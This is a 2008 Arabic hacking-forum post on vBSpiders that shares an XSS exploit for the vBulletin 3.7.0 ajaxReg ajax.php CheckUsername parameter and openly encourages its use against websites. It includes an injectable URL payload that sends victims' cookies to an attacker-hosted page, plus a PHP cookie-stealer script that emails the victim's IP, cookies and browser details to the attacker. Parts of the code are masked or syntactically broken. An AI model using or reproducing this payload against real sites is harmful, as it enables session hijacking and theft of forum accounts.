التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 11-09-2008, 01:04 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية d4rK-h4ck3r
 

 

 
إحصائية العضو







d4rK-h4ck3r غير متواجد حالياً

إرسال رسالة عبر MSN إلى d4rK-h4ck3r

 

 

إحصائية الترشيح

عدد النقاط : 10
d4rK-h4ck3r is on a distinguished road

.................... ثغرة خطير في vBulletin 3.7.0


السلام عليكم


بدون مقدمآت


الثغرة في ملف ajax.php

vBulletin 3.7.0 <= XSS Explot
ثغرة التسجيل بواسطة الآجاكس هي عبارة عن ثغرة في التسجيل اثناء التحقق من المعلومات اثناء كتابتها بالكيبورد هناك مواثع تستخدم طريقة هذه في التسجيل وهذه ثغرة في النسخة 3.7.0

ajaxReg:
ajaxReg - Ajax Registration, with instant field checking - vBulletin.org Forum
الثغرة :

كود PHP:

http
://[website]/[forumpath]/ajax.php?do=CheckUsername&param=# EVIL XSS SCRIPT #
http://www.site.com/forums/ajax.php?do=CheckUsername&param=***************('xss');</script> 
آعمل ملف جديد


كود PHP:
File.php
<?

Ip = $ _SERVER ’REMOTE_ADDR’];
UserAgent = $ _SERVER ’HTTP_USER_AGENT’];
$Accept $ = $ _SERVER ’HTTP_ACCEPT_LANGUAGE’];
$Co okie = $ _GET ’c’];
$Myemail "YOUR E-MAIL;
$Date = today ( "lj FYgia");
$Subject = "Xss th30nR";
$Message = "Th30nuR () 2006
Ip
: $ ip
Coo kies
: $ coo kies
Browser
: $ userAgent
Language
: $ accept
URL
Basic $
Day Time: $ today \\\\ n";
$ From = "
From: $ myemail \\\\ \\\\ n";
Mail ($ myemail, $ subject, $ message, $ from);
?>
تطبيق:
كود PHP:
www.vb.com/vb/ajax.php?do=CheckUsername&param=********** ********.location.replace ’http://WWW.ursite.com/FILE.php?c =’ + ********.co okie); </ script 
مع انك تشيل الفراغات اللي في coo kie
وإختراقات موفقة
وهذا برنامج للاخ Sn!pEr-Dz برنامج لاضهار ملفات اي الموقع مميز جدا وخطير جدا يطلعلك عديد ملفات الموقع مثل ajax.php
والي ناوي يخترق منتدانا اقول هذي النسخة 3.8.1 يعني شوف نعجة العب معاها:d
اخوكم dark hacker اهداء لPassword & inconnu


eyvm o'dv td vBulletin 3>7>0

التوقيع





DДЯk ĦДCkЄЯ
غائب لسنة كاملة بسبب الدراسة الجامعية


 


التعديل الأخير تم بواسطة d4rK-h4ck3r ; 11-09-2008 الساعة 02:41 AM.

   

رد مع اقتباس
 

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
ثغرة أمنية خطيرة في vBulletin v3.8.6 DannY.IraQi قســم تطويــر المــــواقع 1 07-25-2010 06:16 PM
ثغرة XSS في النسخة vbulletin 4.0.2 xman2 قســم تطويــر المــــواقع 1 05-08-2010 01:22 AM
هل يوجد ثغرة vBulletin 3.8.3 hacks قســم إختــراق الأجهــزة 3 10-16-2009 07:45 PM
[ خبـر ] : وجود ثغرة vBulletin 3.8.4 PL1 XSS xman2 قســم تطويــر المــــواقع 0 10-08-2009 09:42 PM
خطير ثغرة تصيب كل المنتديات xman2 قســم تطويــر المــــواقع 0 05-27-2009 01:31 AM


الساعة الآن 08:58 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0